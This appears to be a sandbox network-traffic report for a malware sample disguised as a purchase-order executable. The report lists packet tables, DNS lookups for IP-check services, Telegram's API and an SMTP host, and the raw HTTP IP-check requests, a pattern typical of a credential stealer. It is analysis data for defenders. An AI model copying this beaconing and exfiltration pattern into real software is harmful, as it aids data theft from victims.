Oct 1, 2024 07:21:01.379735947 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.384105921 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:01.388998032 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:01.592236996 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:01.597532988 CEST	49711	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.597582102 CEST	443	49711	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.597656012 CEST	49711	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.602149963 CEST	49711	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.602174997 CEST	443	49711	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.644807100 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:02.068370104 CEST	443	49711	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:02.071516991 CEST	49711	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:02.071532965 CEST	443	49711	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:02.213049889 CEST	443	49711	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:02.213149071 CEST	443	49711	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:02.213211060 CEST	49711	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:02.213927031 CEST	49711	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:02.218230963 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:02.219484091 CEST	49713	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:02.223349094 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:02.223417997 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:02.224293947 CEST	80	49713	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:02.224617958 CEST	49713	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:02.224773884 CEST	49713	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:02.229512930 CEST	80	49713	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:02.921678066 CEST	80	49713	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:02.923315048 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:02.923368931 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:02.923430920 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:02.923803091 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:02.923823118 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:02.972883940 CEST	49713	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:03.386611938 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:03.388695955 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:03.388720989 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:03.533166885 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:03.533287048 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:03.533343077 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:03.534075022 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:03.540332079 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:03.545161963 CEST	80	49716	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:03.545336008 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:03.545608044 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:03.550478935 CEST	80	49716	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:05.218928099 CEST	80	49716	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:05.219253063 CEST	80	49716	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:05.219382048 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.219564915 CEST	80	49716	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:05.219621897 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.219705105 CEST	80	49716	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:05.219806910 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.220937014 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:05.221003056 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:05.221105099 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:05.221398115 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:05.221412897 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:05.678859949 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:05.681210041 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:05.681245089 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:05.803971052 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:05.804074049 CEST	443	49717	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:05.804152966 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:05.804780006 CEST	49717	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:05.808486938 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.809761047 CEST	49718	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.813604116 CEST	80	49716	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:05.813697100 CEST	49716	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.814551115 CEST	80	49718	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:05.814680099 CEST	49718	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.814796925 CEST	49718	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:05.819521904 CEST	80	49718	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:06.500246048 CEST	80	49718	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:06.501683950 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:06.501733065 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:06.501804113 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:06.502053022 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:06.502067089 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:06.551095009 CEST	49718	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:07.034605026 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:07.036740065 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:07.036776066 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:07.179667950 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:07.179776907 CEST	443	49719	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:07.179837942 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:07.180397987 CEST	49719	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:07.184329987 CEST	49718	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:07.185444117 CEST	49720	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:07.190486908 CEST	80	49718	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:07.190601110 CEST	49718	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:07.191193104 CEST	80	49720	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:07.191257000 CEST	49720	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:07.191354990 CEST	49720	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:07.196125984 CEST	80	49720	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:07.883394003 CEST	80	49720	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:07.885176897 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:07.885220051 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:07.885332108 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:07.885620117 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:07.885633945 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:07.927762985 CEST	49720	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:08.339921951 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:08.342152119 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:08.342181921 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:08.474303961 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:08.474411964 CEST	443	49721	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:08.474472046 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:08.475018978 CEST	49721	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:08.478718996 CEST	49720	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:08.480086088 CEST	49722	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:08.483891964 CEST	80	49720	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:08.483961105 CEST	49720	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:08.484934092 CEST	80	49722	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:08.485001087 CEST	49722	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:08.485105991 CEST	49722	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:08.489836931 CEST	80	49722	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:09.178500891 CEST	80	49722	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:09.180345058 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:09.180389881 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:09.180497885 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:09.180811882 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:09.180825949 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:09.222913980 CEST	49722	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:09.634068012 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:09.636006117 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:09.636046886 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:09.758121967 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:09.758260012 CEST	443	49723	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:09.758311033 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:09.759120941 CEST	49723	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:09.762959957 CEST	49722	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:09.764132023 CEST	49724	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:09.768035889 CEST	80	49722	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:09.768112898 CEST	49722	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:09.768903971 CEST	80	49724	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:09.768975019 CEST	49724	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:09.769123077 CEST	49724	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:09.773827076 CEST	80	49724	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:10.432738066 CEST	80	49724	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:10.434245110 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:10.434292078 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:10.434390068 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:10.434690952 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:10.434701920 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:10.473195076 CEST	49724	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:10.898169041 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:10.900135994 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:10.900155067 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:11.048137903 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:11.048228025 CEST	443	49725	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:11.048338890 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:11.049081087 CEST	49725	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:11.052581072 CEST	49724	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:11.053714991 CEST	49726	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:11.057984114 CEST	80	49724	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:11.058438063 CEST	49724	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:11.058521032 CEST	80	49726	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:11.058592081 CEST	49726	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:11.058722973 CEST	49726	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:11.063481092 CEST	80	49726	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:11.731317043 CEST	80	49726	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:11.733052015 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:11.733104944 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:11.733212948 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:11.733519077 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:11.733532906 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:11.785408974 CEST	49726	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:12.185137033 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:12.187041998 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:12.187073946 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:12.333389044 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:12.333479881 CEST	443	49727	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:12.333657026 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:12.334330082 CEST	49727	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:12.364463091 CEST	49726	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:12.369580030 CEST	80	49726	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:12.369718075 CEST	49726	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:12.372538090 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:12.372580051 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:12.372647047 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:12.373106003 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:12.373121977 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:12.981401920 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:12.981523037 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:12.989358902 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:12.989377975 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:12.989655018 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:12.991327047 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:13.031441927 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:13.220815897 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:13.220887899 CEST	443	49728	149.154.167.220	192.168.2.9
Oct 1, 2024 07:21:13.220928907 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:13.225255013 CEST	49728	443	192.168.2.9	149.154.167.220
Oct 1, 2024 07:21:18.440598011 CEST	49713	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:18.611479998 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:18.616460085 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:18.616539955 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:19.340508938 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.340838909 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:19.345721006 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.497006893 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.498248100 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:19.503123999 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.657032013 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.657346010 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:19.662157059 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.818244934 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.818667889 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:19.823407888 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.975565910 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:19.975828886 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:19.980654955 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.155404091 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.155590057 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:20.162400961 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.314780951 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.315548897 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:20.315599918 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:20.315625906 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:20.315638065 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:21:20.320410013 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.320434093 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.320442915 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.320481062 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.704895020 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:21:20.754163980 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:22:58.708041906 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:22:58.712939024 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:22:58.975488901 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:22:58.975514889 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:22:58.975523949 CEST	587	49731	208.91.199.223	192.168.2.9
Oct 1, 2024 07:22:58.976108074 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:22:58.976108074 CEST	49731	587	192.168.2.9	208.91.199.223
Oct 1, 2024 07:22:58.980906963 CEST	587	49731	208.91.199.223	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 07:20:59.620853901 CEST	58467	53	192.168.2.9	1.1.1.1
Oct 1, 2024 07:20:59.627893925 CEST	53	58467	1.1.1.1	192.168.2.9
Oct 1, 2024 07:21:00.683144093 CEST	53699	53	192.168.2.9	1.1.1.1
Oct 1, 2024 07:21:00.692138910 CEST	53	53699	1.1.1.1	192.168.2.9
Oct 1, 2024 07:21:12.364361048 CEST	58865	53	192.168.2.9	1.1.1.1
Oct 1, 2024 07:21:12.371706963 CEST	53	58865	1.1.1.1	192.168.2.9
Oct 1, 2024 07:21:18.602134943 CEST	52779	53	192.168.2.9	1.1.1.1
Oct 1, 2024 07:21:18.610616922 CEST	53	52779	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 07:20:59.620853901 CEST	192.168.2.9	1.1.1.1	0xb49c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:00.683144093 CEST	192.168.2.9	1.1.1.1	0x2a62	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:12.364361048 CEST	192.168.2.9	1.1.1.1	0x6d24	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:18.602134943 CEST	192.168.2.9	1.1.1.1	0xc56a	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 07:20:59.627893925 CEST	1.1.1.1	192.168.2.9	0xb49c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 1, 2024 07:20:59.627893925 CEST	1.1.1.1	192.168.2.9	0xb49c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:20:59.627893925 CEST	1.1.1.1	192.168.2.9	0xb49c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:20:59.627893925 CEST	1.1.1.1	192.168.2.9	0xb49c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:20:59.627893925 CEST	1.1.1.1	192.168.2.9	0xb49c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:20:59.627893925 CEST	1.1.1.1	192.168.2.9	0xb49c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:00.692138910 CEST	1.1.1.1	192.168.2.9	0x2a62	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:00.692138910 CEST	1.1.1.1	192.168.2.9	0x2a62	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:12.371706963 CEST	1.1.1.1	192.168.2.9	0x6d24	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:18.610616922 CEST	1.1.1.1	192.168.2.9	0xc56a	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:18.610616922 CEST	1.1.1.1	192.168.2.9	0xc56a	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:18.610616922 CEST	1.1.1.1	192.168.2.9	0xc56a	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:21:18.610616922 CEST	1.1.1.1	192.168.2.9	0xc56a	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49708	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:20:59.695822954 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 07:21:00.378700972 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:00 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2169360c4b89bd2f873323f81d93742f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 07:21:00.386464119 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 07:21:00.594599962 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:00 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 24aa053b8cef9474141d671c6c0f5905 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 07:21:01.384105921 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 07:21:01.592236996 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 67eb3a8b774308d13a3002f725fdc319 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49713	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:21:02.224773884 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
